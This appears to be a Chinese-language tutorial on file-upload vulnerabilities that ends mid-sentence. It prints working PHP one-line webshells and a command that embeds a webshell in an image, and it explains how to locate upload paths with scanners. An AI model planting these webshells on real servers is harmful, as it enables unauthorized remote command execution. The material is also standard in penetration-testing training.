文件上传漏洞
文件上传本身不是漏洞,但是没有过滤能上传一句话木马就造成了漏洞,
一句话木马:
一句话木马简洁,功能强大,在上传中有很大入侵作用。
常见的一句话php木马
<?php @eval($_REQUEST['cmd']);?>
<?php @eval($_GET['cmd']);?>
<?php @eval($_POST['cmd']);?>
当然还有其他的木马jsp等
图片马
图片马是一句话木马加上图片构造的木马
在路径下准备好一句话木马.php和一张图片 .png (或者 .jpg )
输入系统指令: copy 1.png/b+ 2.php/a 3.png
这样图片木马就合成好
当然还有其他的木马,jsp,asp等
文件上传漏洞利用条件
1,能够上传木马
2,木马能被web容器解析,
3,能找到上传木马的路径或者判断出木马存在的路径
判断文件上传点
可以手工判断
www.xxx.com/upload.php 一般情况下的在upload目录下
还可以使用目录扫描工具进行扫描
drib
御剑扫描等
文件上传成功后判断上传的路径
有可能在upload目录后免,
也有可能上传路径会回显出来,可以通过抓包这类的方式
常见的webshell(连